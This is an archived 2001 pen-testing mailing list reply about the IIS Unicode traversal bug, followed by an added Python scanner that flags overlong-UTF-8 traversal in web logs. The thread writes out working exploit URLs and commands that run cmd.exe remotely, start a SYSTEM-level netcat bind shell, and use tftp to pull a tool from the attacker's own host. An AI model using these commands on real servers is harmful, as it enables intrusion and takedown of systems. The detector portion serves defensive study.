Penetration Testing mailing list archives

Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?


From: Nelson Brito <nelson () SECUNET COM BR>
Date: Tue, 27 Mar 2001 15:23:40 -0300

Renato Ettisberger wrote:

Hi there,

Hello! ;))

As you know, there is a way to spawn a shell with admin rights on an IIS 4.0
with the Unicode bug.

What way? Did you use CmdAsp.ASP to do that? Is it possible?

No, I use the tool hk.exe from RAZOR. With this tool, you can launch a
cmd.exe with system privileges. Upload hk.exe and netcat to the server. The
following URL binds a netcat server with system privileges on port 53 (this
works fine on our test server, IIS 4.0, NT English version):

http://www.target.com/msadc/..%c0%af../%c0%af../%c0%af../winnt/system32/cmd.exe?/c+c:

winnt\system32\hk.exe+cmd+/c+nc.exe+"-n"+"-l"+"-v"+"-p"+53+"-e"+cmd.exe

You could use the same technique with netddemsg.exe to do that! But, when I sent
my first mail I made a *BIG* mistake, coz the netddemsg.exe usage is:
netddemsg.exe [-s <sharename>] <command line>

So you could do:
C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\tftp.exe -i your.own.host.com GET netddemsg.exe"
C:\uniexp>unicodexecute2.pl www.victim.com:80 "C:\\WINNT\\system32\\net.exe share"

Ok, now you have the share names:
C:\uniexp>unicodexecute2.pl www.victim.com:80 "netddemsg.exe -s SHARENAME \"nc.exe -n -l -d -p 53\""

PS: To know more about netddemsg.cpp take a look at:
http://www.atstake.com/research/advisories/2001/a020501-1.txt

PPS: Sorry, @Stake's folks, I didn't put the credits on my first mail. I'm really sorry.

[...]

BTW: My question is, how can I crack the password hash, when it comes in
the following form:

F:0x020020000000000000000000....
V:0x00000000a800000......

I don't know; what kind of tool are you using?

[...]

P.S: My English is not bad, it's horrible, but I hope you understand what
I'm talking about ;-)

Regards,
--
# Nelson Brito - IBQN / Security Networks AG - The trust Company!
# "Windows NT can also be protected from nmap OS detection scans
# thanks to *Nelson Brito* ..."
#              Passage from "Hack Proofing your Network", page 93
open(S,shift) || die "Use: $0 <file>\n";
foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; }
close(S);


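The requests quoted in this thread work because the server tested the raw URL for `..` before percent-decoding it, and the overlong UTF-8 sequence `%c0%af` only became `/` afterwards. The Python below is an added example, not code from this thread or from any of the tools named in it: it decodes a request path the same lenient way (accepting 2-byte overlong forms, so it generalizes past `%c0%af` to any C0/C1-led sequence), canonicalizes the result, flags both the overlong encoding and any `..` that escapes the web root, and runs that check over a few constructed IIS-style log lines. The log layout, the IP addresses and the `lenient_utf8`/`canonicalize`/`scan_log` names are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log lines in a simplified IIS-like layout (date time
# client-ip method uri status). These are made up for the example.
SAMPLE_LOG = """\
2001-03-27 18:20:01 10.0.0.5 GET /index.html 200
2001-03-27 18:20:07 10.0.0.9 GET /msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir 200
2001-03-27 18:20:11 10.0.0.5 GET /images/logo.gif 200
2001-03-27 18:20:15 10.0.0.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 200
"""

LOG_RE = re.compile(r"^\S+ \S+ (?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d+)$")


def lenient_utf8(data: bytes):
    """Decode bytes the way the vulnerable decoder did.

    A 2-byte sequence with lead byte C0 or C1 is an overlong encoding of a
    7-bit ASCII value (C0 AF -> '/', C1 9C -> '\\'). Strict UTF-8 rejects
    these; here they are mapped to the ASCII byte they encode so we can see
    the path the server would actually have acted on.
    Returns (text, overlong_seen).
    """
    out = bytearray()
    overlong = False
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            overlong = True
            i += 2
        else:
            out.append(b)
            i += 1
    # Anything that is still not valid UTF-8 is replaced rather than raised,
    # so one malformed request cannot abort a whole log scan.
    return bytes(out).decode("utf-8", errors="replace"), overlong


def canonicalize(raw_path: str):
    """Decode first, then normalize: returns (canonical_path, flags).

    flags contains 'overlong-utf8' when an overlong sequence was decoded and
    'traversal' when a '..' segment tries to climb above the web root.
    Checking only after full decoding is the point; the original check ran
    on the still-encoded string and never saw the '/'.
    """
    path = raw_path.split("?", 1)[0]          # drop the query string
    text, overlong = lenient_utf8(unquote_to_bytes(path))
    flags = set()
    if overlong:
        flags.add("overlong-utf8")
    stack = []
    for seg in text.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            else:
                flags.add("traversal")        # popped past the root
        else:
            stack.append(seg)
    return "/" + "/".join(stack), flags


def scan_log(log_text: str):
    """Return [(ip, raw_path, canonical_path, sorted_flags)] for every
    request that decodes to an overlong sequence or a root escape."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        canonical, flags = canonicalize(m["path"])
        if flags:
            hits.append((m["ip"], m["path"], canonical, sorted(flags)))
    return hits


if __name__ == "__main__":
    for ip, raw, canon, flags in scan_log(SAMPLE_LOG):
        print(f"{ip}  {raw}  ->  {canon}  {flags}")
```

The same decode-then-check ordering is what the vendor fix and every later path-normalization rule rely on: a request is only safe to test for `..` once every encoding layer has been removed and backslashes have been folded to slashes.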